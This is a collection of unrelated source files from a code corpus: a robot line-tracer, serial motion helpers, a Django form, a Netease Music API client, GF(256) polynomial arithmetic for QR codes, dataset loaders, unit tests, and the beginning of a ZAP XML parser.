LeftPwm = GPIO.PWM(MotorLeft_PWM, 100)\n RightPwm = GPIO.PWM(MotorRight_PWM, 100)\n\n LeftPwm.start(0)\n RightPwm.start(0)\n\n global forward0, forward1, backward0 , backward1\n forward0 = False\n forward1 = True\n\n backward0 = True\n backward1 = False\n\n\ndef leftmotor(x):\n if x == True:\n GPIO.output(MotorLeft_A, GPIO.HIGH)\n GPIO.output(MotorLeft_B, GPIO.LOW)\n elif x == False:\n GPIO.output(MotorLeft_A, GPIO.LOW)\n GPIO.output(MotorLeft_B, GPIO.HIGH)\n else:\n print('Config Error')\n\n\ndef rightmotor(x):\n if x == True:\n GPIO.output(MotorRight_A, GPIO.LOW)\n GPIO.output(MotorRight_B, GPIO.HIGH)\n elif x == False:\n GPIO.output(MotorRight_A, GPIO.HIGH)\n GPIO.output(MotorRight_B, GPIO.LOW)\n else:\n print('Config Error')\n\ndef stop():\n GPIO.output(MotorLeft_PWM, GPIO.LOW)\n LeftPwm.ChangeDutyCycle(0)\n\n GPIO.output(MotorRight_PWM, GPIO.LOW)\n RightPwm.ChangeDutyCycle(0)\n\n\ndef getSensor():\n Sensor = [GPIO.input(otd),\n GPIO.input(otb),\n GPIO.input(ota),\n GPIO.input(otc),\n GPIO.input(ote)]\n return Sensor\n\ndef go_forward(rs, ls , t):\n leftmotor(forward0)\n GPIO.output(MotorLeft_PWM,GPIO.HIGH)\n rightmotor(forward0)\n GPIO.output(MotorRight_PWM,GPIO.HIGH)\n LeftPwm.ChangeDutyCycle(40 + (ls))\n RightPwm.ChangeDutyCycle(48 + (rs))\n time.sleep(t)\n\ndef ptL(rs, ls, b,t):\n leftmotor(backward0)\n GPIO.output(MotorLeft_PWM,GPIO.HIGH)\n rightmotor(forward0)\n GPIO.output(MotorRight_PWM,GPIO.HIGH)\n LeftPwm.ChangeDutyCycle(ls)\n RightPwm.ChangeDutyCycle(rs + 8)\n if b:\n time.sleep(t)\n\ndef ptR(rs, ls , b,t):\n leftmotor(forward0)\n GPIO.output(MotorLeft_PWM,GPIO.HIGH)\n rightmotor(backward0)\n GPIO.output(MotorRight_PWM,GPIO.HIGH)\n LeftPwm.ChangeDutyCycle(ls)\n RightPwm.ChangeDutyCycle(rs + 8)\n if b:\n time.sleep(t)\ndef TurnR():\n while True:\n sl = getSensor()\n if sl[4] == 0:\n go_forward(0,0,0.0001)\n if sl[2] == 1:\n ptR(50,50,True,0.1)\n elif sl[2] == 0:\n break\ndef TurnL():\n while True:\n sl = getSensor()\n if sl[0] == 0:\n go_forward(0,0,0.0001)\n if sl[2] == 1:\n ptL(50,50,True,0.1)\n elif sl[2] == 0:\n break\ndef linetracing():\n while True:\n go_forward(0,0,1)\n\ndef U_Turn():\n while True:\n sl = getSensor()\n if sl[2] == 1:\n ptR(50,50,True,0.1)\n elif sl[2] == 0:\n break\n\ndef maze(sl):\n\n if sl == [0,0,0,0,0]:\n go_forward(0,0,1)\n sl = getSensor()\n if sl == [0,0,0,0,0]:\n stop()\n GPIO.cleanup()\n\n\n\n elif sl[4] == 0:\n TurnR()\n\n elif sl[2] == 0:\n linetracing()\n\n elif sl[0] == 0:\n TurnL()\n\n elif sl == [1,1,1,1,1]:\n go_forward(0,0,0.2)\n sl = getSensor()\n if sl == [1,1,1,1,1]:\n U_Turn()\n\n\n\n\n\n return True\n\n\nif __name__ == '__main__':\n try:\n setup()\n while True:\n SensorList = getSensor()\n print(SensorList)\n gotracing = maze(SensorList)\n\n except KeyboardInterrupt:\n stop()\n GPIO.cleanup()\n\n\n","sub_path":"20171583linetracing.py","file_name":"20171583linetracing.py","file_ext":"py","file_size_in_byte":4241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"124677347","text":"# -*- encoding: utf-8 -*-\n# Copyright (c) 2015 b<>com\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom unittest import mock\n\nfrom watcher.decision_engine.audit import continuous as continuous_handler\nfrom watcher.decision_engine.audit import oneshot as oneshot_handler\nfrom watcher.decision_engine.messaging import audit_endpoint\nfrom watcher.decision_engine.model.collector import manager\nfrom watcher.tests.db import base\nfrom watcher.tests.decision_engine.model import faker_cluster_state\nfrom watcher.tests.objects import utils as obj_utils\n\n\nclass TestAuditEndpoint(base.DbTestCase):\n def setUp(self):\n super(TestAuditEndpoint, self).setUp()\n self.goal = obj_utils.create_test_goal(self.context)\n self.audit_template = obj_utils.create_test_audit_template(\n self.context)\n self.audit = obj_utils.create_test_audit(\n self.context,\n audit_template_id=self.audit_template.id)\n\n @mock.patch.object(continuous_handler.ContinuousAuditHandler, 'start')\n @mock.patch.object(manager.CollectorManager, \"get_cluster_model_collector\")\n def test_do_trigger_audit(self, mock_collector, mock_handler):\n mock_collector.return_value = faker_cluster_state.FakerModelCollector()\n\n audit_handler = oneshot_handler.OneShotAuditHandler\n endpoint = audit_endpoint.AuditEndpoint(audit_handler)\n\n with mock.patch.object(oneshot_handler.OneShotAuditHandler,\n 'execute') as mock_call:\n mock_call.return_value = 0\n endpoint.do_trigger_audit(self.context, self.audit.uuid)\n\n self.assertEqual(mock_call.call_count, 1)\n\n @mock.patch.object(continuous_handler.ContinuousAuditHandler, 'start')\n @mock.patch.object(manager.CollectorManager, \"get_cluster_model_collector\")\n def test_trigger_audit(self, mock_collector, mock_handler):\n mock_collector.return_value = faker_cluster_state.FakerModelCollector()\n\n audit_handler = oneshot_handler.OneShotAuditHandler\n endpoint = audit_endpoint.AuditEndpoint(audit_handler)\n\n with mock.patch.object(endpoint.executor, 'submit') as mock_call:\n mock_execute = mock.call(endpoint.do_trigger_audit,\n self.context,\n self.audit.uuid)\n endpoint.trigger_audit(self.context, self.audit.uuid)\n\n mock_call.assert_has_calls([mock_execute])\n self.assertEqual(mock_call.call_count, 1)\n","sub_path":"watcher/tests/decision_engine/messaging/test_audit_endpoint.py","file_name":"test_audit_endpoint.py","file_ext":"py","file_size_in_byte":2990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"436536522","text":"# coding: utf8\n\nimport serial\nimport threading,time\nimport thread\n\ncpmm = 250\n\n\n\ndef deplacer(t):\n x_mm = t[0]\n y_mm = t[1]\n x_clicks = x_mm * cpmm\n y_clicks = y_mm * cpmm\n deplacer_aux((x_clicks, y_clicks, angle))\n\ndef deplacer_aux(t): ##x,y en clicks, angle en millième de radians. Déplacement rectiligne entre deux points\n x,y,angle = t\n readPos()\n\n ##calcul de l'angle à donner en consigne\n pos_x, pos_y, pos_angle = position\n delta_x = x - pos_x\n delta_y = y - pos_y\n norme = pow((delta_x**2+delta_y**2),1/2)\n if delta_y > 0 :\n cos_cons_angle = delta_x / norme\n cons_angle = arccos(cos_cons_angle)\n else :\n cos_cons_angle = delta_x / norme\n cons_angle = -arccos(cos_cons_angle)\n delta_angle = cons_angle - pos_angle\n ##fin du calcul\n\n cmd(3,delta_angle) ## le robot tourne de delta_angle\n cmd(1,(norme,4000)) ## le robot avance de norme à la vitesse 4000\n cmd(3,angle-cons_angle) ## le robot se met dans l'angle donné en consigne\n\ndef aller(t): ##distance en mm, angle en °, case6.\n\tdistance,angle = t\n\tdistance += 32768\n\tangle += 32768\n\tdistance=min(distance,256**2-1)\n\tdistance=max(0,distance)\n\tangle = min(angle,256**2-1)\n\tangle = max(0,angle)\n\tArg1 = distance/256\n\tArg0 = distance%256\n\tArg3 = angle/256\n\tArg2 = angle%256\n\n\tmove.write(chr(6)+chr(4) +chr(Arg0) +chr(Arg1) +chr(Arg2) +chr(Arg3))\n\t\ndef allerSeq(t): ##distance en mm, angle en °, case 7.\n\tdistance,angle = t\n\tdistance += 32768\n\tangle += 32768\n\tdistance=min(distance,256**2-1)\n\tdistance=max(0,distance)\n\tangle = min(angle,256**2-1)\n\tangle = max(0,angle)\n\tArg1 = distance/256\n\tArg0 = distance%256\n\tArg3 = angle/256\n\tArg2 = angle%256\n\n\tmove.write(chr(6)+chr(4) +chr(Arg0) +chr(Arg1) +chr(Arg2) +chr(Arg3))\n\n\ndef avancer(t): ##case 1\n\tdistance,speed = t\n\tdistance += 32768\n\tspeed += 32768\n\tdistance=min(distance,256**2-1)\n\tdistance=max(0,distance)\n\tspeed=min(speed,256**2-1)\n\tspeed=max(0,speed)\n\tArg1 = distance/256\n\t#Arg0 = distance - 256*Arg1\n\tArg0=distance%256\n\tArg3 = speed/256\n\t#Arg2 = speed - 256*Arg3\n\tArg2 = speed %256\n\tmove.write(chr(1)+chr(4)+chr(Arg0)+chr(Arg1)+chr(Arg2)+chr(Arg3))\n\ndef r(): #case2\n\tmove.write(chr(2)+chr(0))\n\ndef re(): #case999\n\tmove.write(chr(999)+chr(0))\n\ndef tourner(angle): #case3\n\tangle += 32768\n\tif angle > 256**2 - 1:\n\t\tangle = 256**2 - 1\n\tif angle < 0 :\n\t\tangle = 0\n\tArg1 = angle/256\n\tArg0 = angle - 256*Arg1\n\tmove.write(chr(3)+chr(2)+chr(Arg0)+chr(Arg1))\n\ndef setNewTarget(t): #case4, x et y en clicks\n\tx,y=t\n\tx += 32768\n\tif x > 256**2 - 1:\n\t\tx = 256**2 - 1\n\tif x < 0 :\n\t\tx = 0\n\tArg1 = x/256\n\tArg0 = x - 256*Arg1\n\ty += 32768\n\tif y > 256**2 - 1:\n\t\ty = 256**2 - 1\n\tif y < 0 :\n\t\ty = 0\n\tArg3 = y/256\n\tArg2 = y - 256*Arg3\n\tmove.write(chr(4)+chr(4)+chr(Arg0)+chr(Arg1)+chr(Arg2)+chr(Arg3))\n\ndef hasArrived(): #case5\n\tmove.write(chr(5)+chr(0))\n\ndef readPos(): #case140\n\tmove.write(chr(140)+chr(0))\n\n","sub_path":"Fichiers_Python_Raspberry/fonctions.py","file_name":"fonctions.py","file_ext":"py","file_size_in_byte":2890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"290460920","text":"from django import forms\nfrom .models import SuperHeroApp\n\n# choices\nRICH_POWER_CHOICES = (\n ('rich', 'Rich'),\n ('superpower', 'Superpower'),\n)\n\n# choices\nSUPER_POWER_CHOICES = (\n ('flight', 'Flight'),\n ('speed', 'Speed'),\n ('telekenetic', 'Telekenetic'),\n ('healing', 'Healing'),\n ('invisibility', 'Invisibility'),\n ('time travel', 'Time Travel'),\n\n)\n\n# choices\nGOOD_BAD_CHOICES = (\n ('good', 'Good'),\n ('kinda good', 'Kinda Good'),\n ('lukewarm', 'Lukewarm'),\n ('sorta evil', 'Sorta Evil'),\n ('hell hot', 'Hell Hot'),\n)\n\n# form for model\nclass SuperForm(forms.ModelForm):\n class Meta:\n model = SuperHeroApp\n fields = \"__all__\"\n # labels for form questions\n labels ={\n \"name\": \"Name\",\n \"cityorigin\": \"City/Origin/Planet\",\n \"richpower\": \"Are you rich, or have superpowers?\",\n \"whichPower\": \"If superpower, which one(s)?\",\n \"goodEvil\": \"On a scale of Heaven and Hell, which are you?\",\n \"examples\": \"Give us 3 examples of when you used your super hero abilities:\",\n }\n # to show specific widget types for form questions\n widgets = {\n \"richpower\": forms.RadioSelect(choices=RICH_POWER_CHOICES),\n \"whichPower\": forms.CheckboxSelectMultiple(choices=SUPER_POWER_CHOICES),\n \"goodEvil\": forms.Select(choices=GOOD_BAD_CHOICES),\n\n }","sub_path":"SuperHeroApp/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"10609154","text":"#!/usr/bin/env python2.7\n# -*- coding: utf-8 -*-\n\n__author__ = 'Quan zhou'\n\nimport os\nimport json\nimport base64\nimport requests\n\nfrom Crypto.Cipher import AES\n\ndefault_timeout = 10\n\nmodulus = '00e0b509f6259df8642dbc35662901477df22677ec152b5ff68ace615bb7b725152b3ab17a876aea8a5aa76d2e417629ec4ee341f56135fccf695280104e0312ecbda92557c93870114af6c9d05c4f7f0c3685b7a46bee255932575cce10b424d813cfe4875d3e82047b97ddef52741d546b8e289dc6935b3ece0462db0a22b8e7'\nnonce = '0CoJUm6Qyw8W8jud'\npubKey = '010001'\nusr_agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36'\n\n# 新api的加密方式(from Github网易云API)\ndef aesEncrypt(text, secKey):\n pad = 16 - len(text) % 16\n text = text + pad * chr(pad)\n encryptor = AES.new(secKey, 2, '0102030405060708')\n ciphertext = encryptor.encrypt(text)\n ciphertext = base64.b64encode(ciphertext)\n return ciphertext\n\ndef rsaEncrypt(text, pubKey, modulus):\n text = text[::-1]\n rs = int(text.encode('hex'), 16)**int(pubKey, 16) % int(modulus, 16)\n return format(rs, 'x').zfill(256)\n\n\ndef createSecretKey(size):\n return (''.join(map(lambda xx: (hex(ord(xx))[2:]), os.urandom(size))))[0:16]\n\ndef encrypted_request(text):\n text = json.dumps(text)\n secKey = createSecretKey(16)\n encText = aesEncrypt(aesEncrypt(text, nonce), secKey)\n encSecKey = rsaEncrypt(secKey, pubKey, modulus)\n data = {\n 'params': encText,\n 'encSecKey': encSecKey\n }\n return data\n\nclass NeteaseApi(object):\n \"\"\"网易云Api,可用来查询相关数据\n\n \"\"\"\n def __init__(self, user_agent=usr_agent):\n self.header = {\n 'Host': 'music.163.com',\n 'Referer': 'http://music.163.com',\n 'Accept': '*/*',\n 'Accept-Encoding': 'gzip,deflate,sdch',\n 'Accept-Language': 'zh-CN,zh;q=0.8,gl;q=0.6,zh-TW;q=0.4',\n 'Connection': 'keep-alive',\n 'Content-Type': 'application/x-www-form-urlencoded',\n 'User-Agent': usr_agent,\n }\n self.cookies = {\n 'appver': '1.5.2'\n }\n self.session = requests.Session()\n\n def get_event(self, uid, offset=0, total='true', limit=60):\n action = 'http://music.163.com/weapi/event/get/' + uid + '?csrf_token='\n #print(action)\n data = {\n 'offset': offset,\n 'total': total,\n 'limit': 10\n }\n return self.httpRequest('POST', action, data)\n\n def get_user(self, uid, offset=0, total='false', limit=60):\n record = self.get_event(uid)\n if record['code'] != 200:\n return {'code': 400 }# Bad Request\n resp = {\n 'code': 200,\n 'user': record['events'][0]['user']\n }\n return resp\n\n def get_follows(self):\n # action = 'http://music.163.com/weapi/user/getfollows/30529065?csrf_token='\n pass\n\n def get_followeds(self, uid, offset=0, total='true', limit=60):\n action = 'http://music.163.com/weapi/user/getfolloweds/?csrf_token='\n data = { \"userId\": uid,\n 'offset': offset,\n 'total': total,\n 'limit': 10\n }\n return self.httpRequest('POST', action, data)\n\n def search(self, s, stype=1, offset=0, total='true', limit=60):\n '''\n search for entities\n '''\n action = 'http://music.163.com/weapi/search/get'\n data = {\n 's': s,\n 'type': stype,\n 'offset': offset,\n 'total': total,\n 'limit': 60\n }\n return self.httpRequest('POST', action, data)\n\n def httpRequest(self, method, action, query=None, timeout=None):\n connection = json.loads(self.rawHttpRequest(method, action, query, timeout))\n return connection\n\n def rawHttpRequest(self, method, action, query=None, timeout=None):\n query = encrypted_request(query)\n\n if (method == 'GET'):\n url = action if (query == None) else (action + '?' + query)\n connection = self.session.get(url, headers=self.header, timeout=default_timeout)\n\n elif (method == 'POST'):\n connection = self.session.post(\n action,\n data=query,\n headers=self.header,\n timeout=default_timeout\n )\n connection.encoding = \"UTF-8\"\n return connection.text\n\nif __name__ == '__main__':\n n = NeteaseApi()\n from pprint import pprint\n pprint(n.get_user('30529065'))\n pprint(n.get_followeds('30529065'))\n","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":4663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"614087325","text":"#!/usr/bin/python3\n\nfrom qrcodeoutils import *\n\nannulateur=285#0x11d#0b100011101\n\n@memorise\nclass F256():\n def __init__(self,s):\n if isinstance(s,str) or hasattr(s,'__iter__') or hasattr(s,'iter'):\n self.val=bin2dec(s)\n elif type(s) is F256:\n self.val=s.val\n else:\n self.val=s\n while True:\n ch=bin(self.val)[2:]\n if len(ch)<=8:\n break\n self.val^=annulateur*2**(9-len(ch))\n self.corps=F256\n def __str__(self):\n# nb=bin(self.val)[2:]\n# nb=\"0\"*(8-len(nb))+nb\n# nb2=\"\"\n# for c in nb:\n# nb2=nb2+c+\"\\u0305\"\n nb=hex(self.val)[2:]\n return nb\n def __repr__(self):\n return str(self)\n def __add__(self,n):\n return F256(self.val^n.val)\n def __sub__(self,n):\n return self+n\n def __neg__(self):\n return self\n def __mul__(self,n):\n if self.val==0 or n.val==0:\n return F256(0)\n else:\n return F256(F256.exp((self.log()+n.log())))\n def __truediv__(self,n):\n if n.val==0:\n raise ZeroDivisionError\n if self.val==0:\n return F256(0)\n return F256(F256.exp((self.log()-n.log())))\n def __pow__(self,e):\n if self.val==0:\n if e<0:\n raise ZeroDivisionError\n elif e==0:\n return F256(1)\n else:\n return F256(0)\n return F256(F256.exp((e*self.log())))\n def log(self):\n if self.val==0:\n raise ZeroDivisionError\n return F256.log[self.val]\n\nF256.log=dict()\nexp=[]\nnb=1\nfor i in range(255):\n F256.log[nb]=i\n exp.append(nb)\n nb*=2\n if nb>=256:\n nb^=annulateur\nF256.exp=lambda i:exp[i%255]\n#F256.exp.append(1)\n#F256.exp*=2\nF256.__name__=\"𝔽_2⁸\"\n\n@memorise\nclass Polynome(ElementAnneau):\n\n def __init__(self,c):\n if type(c) is Polynome:\n self.coefficients=tuple(c.coefficients)\n elif type(c) is Polynome.corps:\n self.coefficients=(c,)\n elif not hasattr(c,'__iter__') and not hasattr(c,'iter'):\n self.coefficients=(Polynome.corps(c),)\n else:\n self.coefficients=tuple(c)\n try:\n while self.coefficients[0]==Polynome.corps(0):\n self.coefficients=self.coefficients[1:]\n except IndexError:\n pass\n\n def estzero(self):\n return self.coefficients==tuple()\n\n def __str__(self):\n if self.estzero():\n return \"0\"\n expo={\"0\":\"⁰\",\"1\":\"¹\",\"2\":\"²\",\"3\":\"³\",\"4\":\"⁴\",\"5\":\"⁵\",\"6\":\"⁶\",\"7\":\"⁷\",\"8\":\"⁸\",\"9\":\"⁹\"}\n return \"+\".join([str(self.coefficients[i])+\"X\"+\"\".join(expo[j] for j in str(self.degre()-i)) for i in range(len(self)) if self.coefficients[i]!=Polynome.corps(0)])\n\n def __repr__(self):\n return str(self)\n\n def __call__(self,val):\n res=Polynome(tuple())\n if type(val) is type(self):\n va=val\n else:\n va=Polynome(tuple([val]))\n for c in self:\n res*=va\n res+=Polynome(tuple([c]))\n if type(val) is type(self):\n return res\n if res.coefficients:\n return res[0]\n return Polynome.corps(0)\n def __abs__(self):\n return len(self.coefficients)\n def __len__(self):\n return len(self.coefficients)\n def __iter__(self):\n return iter(self.coefficients)\n def iter(self):\n return self.__iter__()\n def __getitem__(self,i):\n return self.coefficients[self.degre()-i]\n def __setitem__(self,i,x):\n coef=list(self.coefficients)\n coef[self.degre()-i]=x\n self.coefficients=tuple(coef)\n def coefficientdominant(self):\n return self.coefficients[0]\n def degre(self):\n return abs(self)-1\n def __eq__(self,autre):\n return self.coefficients==autre.coefficients#all([x==y for (x,y) in zip(self,autre)])\n def __add__(self,autre):\n somme=[Polynome.corps(0)]*(max(len(self),len(autre))-len(self))+list(self.coefficients)\n for i in range(len(autre)):\n somme[-i-1]+=autre[i]\n return Polynome(tuple(somme))\n def __xor__(self,autre):\n return self+autre\n def __neg__(self):\n return Polynome(tuple((-a for a in self)))\n def __sub__(self,autre):\n return self+(-autre)\n def __mul__(self,autre):\n if self.estzero() or autre.estzero():\n return Polynome(tuple())\n prod=[Polynome.corps(0) for _ in range(len(self)+len(autre)-1)]\n for i in range(len(self)):\n for j in range(len(autre)):\n prod[-i-j-1]+=autre[j]*self[i]\n return Polynome(tuple(prod))\n def __pow__(self,exp):\n if exp>0:\n prod=Polynome(tuple([Polynome.corps(1)]))\n x=Polynome(self.coefficients)\n while exp>1:\n if exp%2:\n prod*=x\n x*=x\n exp//=2\n return prod*x\n elif exp==0:\n return Polynome(tuple([Polynome.corps(1)]))\n\n def __divmod__(self,diviseur):\n quotient,reste=Polynome(tuple()),self\n degdiviseur=diviseur.degre()\n coefdom=diviseur.coefficientdominant()\n while reste.degre()>=degdiviseur:\n monomediviseur=Polynome(tuple([reste.coefficientdominant()/coefdom]+[Polynome.corps(0)]*(reste.degre()-degdiviseur)))#)+zeros)\n quotient+=monomediviseur\n reste-=monomediviseur*diviseur\n# print(\":\",quotient,reste)\n return quotient,reste\n\n def __floordiv__(self,div):\n q,_=divmod(self,div)\n return q\n def __mod__(self,div):\n _,r=divmod(self,div)\n return r\n\n def bezoutpoly(self,p2):\n r,u,v,rr,uu,vv=p2,Polynome.construction([1]),Polynome.construction([0]),self,Polynome.construction([0]),Polynome.construction([1])\n while not rr.estzero():\n# while rr.degre()>=len(p2)/2:\n q=r//rr\n r,u,v,rr,uu,vv=rr,uu,vv,r-q*rr,u-q*uu,v-q*vv\n return v,u,r\n\n def der(self):\n# l=self.degre()\n derive=[Polynome.corps(0) for _ in self]\n for i in range(len(self)):\n if i%2==1:\n derive[-i-1]=self[i]\n# print(i,self[i])\n# print(derive)\n return Polynome(tuple(derive[:-1]))\n\nPolynome.corps=F256\nPolynome.__name__=\"(%s)[x]\"%F256.__name__\nPolynome.construction=lambda L: Polynome(tuple(F256(x) for x in L))\n\ndef message2poly(message):\n poly=[]\n# print(len(message))\n for i in range(len(message)//8):\n poly.append(F256(bin2dec(message[8*i:8*i+8])))\n# print(poly)\n return Polynome(tuple(poly))\n\ndef poly2message(poly):\n mess=poly.coefficients\n liste=[]\n for c in mess:\n b=[int(i) for i in bin(c.val)[2:]]\n liste=liste+[0]*(8-len(b))+b\n return liste\n\n#def bezoutpoly(p1,p2):\n# r,u,v,rr,uu,vv=p2,Polynome.construction([1]),Polynome.construction([0]),p1,Polynome.construction([0]),Polynome.construction([1])\n# while not rr.estzero():\n# q=r//rr\n# r,u,v,rr,uu,vv=rr,uu,vv,r-q*rr,u-q*uu,v-q*vv\n# return u,v,r\n\nif __name__==\"__main__\":\n a=F256(140)\n print(a)\n b=F256(\"101\")\n print(b)\n# b=F256((1,0,1))\n# print(b)\n print(a.log())\n print(b+a)\n print(a*a*a*a*a*a)\n print(a**6)\n# print([F256(i) for i in F256.exp[:15]])\n erreurs=[]\n for i in range(256):\n if F256.log[F256.exp(i)]!=i:\n erreurs.append([i,F256.log[F256.exp(i)]])\n if not erreurs:\n print(\"log et exp OK.\")\n else:\n print(erreurs)\n print(F256.log[128])\n print(Polynome.__name__)\n poly=Polynome.construction\n p=poly((15,1,12))\n q=poly((\"11\",\"10110\",\"0\"))\n print(p,q)\n print(p+q)\n# print(a*p)\n print(p%q)\n print(divmod(p,q))\n print(p//q*q+p%q)\n print(p^q)\n print(p*p)\n print(p**2)\n print(p(F256(1)))\n print(p(q))\n print(p(q).der())\n# p*=q\n# p=poly([0x12,0x34,0x56,0,0,0,0])\n# q=poly([1,0xf,0x36,0x78,0x40])\n# print(divmod(p,q))\n message=\"4254c6973657a20474e552f4c696e7578206d6167617a696e65204672616e63652e20f09f98830ec11ec11ec11ec11ec11ec11ec11ec11\"\n correction=\"0b1622eb6e2c152a08d34a2dd8c788\"\n\n# message=\"40d2754776173206272696c6c69670ec\"\n# correction=\"bc2a90136bafeffd4be0\"\n\n polynome=[]\n for i in range(len(message)//2):\n polynome=polynome+[eval(\"0x\"+message[2*i:2*i+2])]\n polynome=poly(polynome+[0]*(len(correction)//2))\n# print(len(polynome))\n# print(polynome)\n modulo=poly([1])\n for i in range(len(correction)//2):\n modulo*=poly([1,F256.exp(i)])\n# print(modulo)\n reste=polynome%modulo\n ch=\"\"\n for i in reste.coefficients:\n s=str(i)\n ch=ch+\"0\"*(2-len(s))+s\n print(ch)\n print(correction)\n# print(''.join(str(i) for i in (polynome%modulo).coefficients))\n# for i in range(len(F256.exp)):\n# print(i,bin(F256.exp[i])[2:])\n# for i in range(1,256):\n# print(i,F256.log[i])\n# print(len(F256.exp),len(F256.log))\n","sub_path":"Reperes/QR_code/qrcorps.py","file_name":"qrcorps.py","file_ext":"py","file_size_in_byte":8111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"72680542","text":"import math\ncount = 1\nnum = 2\nprimes = [2]\nwhile True:\n\t# print(num),\n\t# ok=0\n\tif num%2==0 and num!=2:\n\t\t# print('no'),\n\t\tok=0\n\telse:\n\t\tcheckmax = math.sqrt(num)\n\t\t# print(num, checkmax)\n\t\tfor i in primes:\n\t\t\tok=0\n\t\t\tif i > checkmax + 1: \n\t\t\t\tok = 1\n\t\t\t\tbreak\n\t\t\telif num % i == 0:\n\t\t\t\t# print(i),\n\t\t\t\tbreak\n\t\t\tok = 1\n\n\tif ok:\n\t\t# print(num)\n\t\tprimes.append(num)\n\t\t# print(primes)\n\tif len(primes)==10001:\n\t\tbreak\n\n\tnum += 1\n\t# print\nprint(primes[-1])","sub_path":"euler/p007_yb.py","file_name":"p007_yb.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"201326363","text":"\"\"\"\nBNCI 2014-001 Motor imagery dataset.\n\"\"\"\n\nfrom .base import BaseDataset\nfrom mne.datasets.bnci import load_data\n\n\nclass MNEBNCI(BaseDataset):\n \"\"\"Base BNCI dataset\"\"\"\n\n def get_data(self, subjects):\n \"\"\"return data for a list of subjects.\"\"\"\n data = []\n for subject in subjects:\n data.append(self._get_single_subject_data(subject))\n return data\n\n def _get_single_subject_data(self, subject):\n \"\"\"return data for a single subject\"\"\"\n raw_files, event_id = load_data(subject=subject, dataset=self.code,\n verbose=False)\n return raw_files\n\n\nclass BNCI2014001(MNEBNCI):\n \"\"\"BNCI 2014-001 Motor Imagery dataset\"\"\"\n\n def __init__(self):\n self.subject_list = range(1, 10)\n self.name = 'BNCI 2014-001 Motor Imagery'\n self.code = '001-2014'\n\n\nclass BNCI2014002(MNEBNCI):\n \"\"\"BNCI 2014-002 Motor Imagery dataset\"\"\"\n\n def __init__(self):\n self.subject_list = range(1, 15)\n self.name = 'BNCI 2014-002 Motor Imagery'\n self.code = '002-2014'\n\n\nclass BNCI2014004(MNEBNCI):\n \"\"\"BNCI 2014-004 Motor Imagery dataset\"\"\"\n\n def __init__(self):\n self.subject_list = range(1, 10)\n self.name = 'BNCI 2014-004 Motor Imagery'\n self.code = '004-2014'\n\n\nclass BNCI2015001(MNEBNCI):\n \"\"\"BNCI 2015-001 Motor Imagery dataset\"\"\"\n\n def __init__(self):\n self.subject_list = range(1, 13)\n self.name = 'BNCI 2015-001 Motor Imagery'\n self.code = '001-2015'\n","sub_path":"moabb/datasets/bnci.py","file_name":"bnci.py","file_ext":"py","file_size_in_byte":1539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"20748163","text":"\"\"\"Tests for src/link_parser.py\"\"\"\nimport unittest\nfrom unittest.mock import patch, Mock\n\nfrom link_parser import ThreadPoolLinkHandler\n\n\nclass TestThreadPoolLinkHandler(unittest.TestCase):\n def setUp(self):\n self.link = \"http://en.wikipedia.org/wiki/Genus\"\n self.max_workers = 10\n self.wiki = ThreadPoolLinkHandler(self.link, self.max_workers)\n\n @patch(\"link_parser.requests.Session.get\")\n def test_url_downloader(self, mocked_get):\n mocked_get.return_value = Mock(status_code=200, text=\"1\")\n result = self.wiki.url_downloader(self.link)\n mocked_get.assert_called_with(self.link, timeout=1)\n assert result == \"1\"\n\n @patch(\"requests.sessions.Session.head\")\n def test_check_url_headers(self, mocked_head):\n mocked_head.return_value.status_code = 200\n mocked_head.return_value.headers = {\"Last-Modified\": \"some_date\"}\n result = self.wiki.check_url_headers(self.link)\n mocked_head.assert_called_with(self.link, timeout=1)\n assert result == \"some_date\"\n","sub_path":"tests/test_link_parser.py","file_name":"test_link_parser.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"55414401","text":"# Copyright (c) 2022 Project CHIP Authors\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport logging\nimport typing\nimport xml.sax.handler\nfrom dataclasses import dataclass\nfrom typing import List, Optional, Union\n\nfrom matter_idl.matter_idl_types import Idl\nfrom matter_idl.zapxml.handlers import Context, ZapXmlHandler\n\n\nclass ParseHandler(xml.sax.handler.ContentHandler):\n \"\"\"A parser for ZAP-style XML data definitions.\n\n Defers its processing to ZapXmlHandler and keeps track of:\n - an internal context for all handlers\n - the parsed Idl structure that is incrementally built\n - sets up parsing location within the context\n - keeps track of ParsePath\n\n Overall converts a python SAX handler into matter_idl.zapxml.handlers\n \"\"\"\n\n def __init__(self, include_meta_data=True):\n super().__init__()\n self._idl = Idl()\n self._processing_stack = []\n # Context persists across all\n self._context = Context()\n self._include_meta_data = include_meta_data\n self._locator = 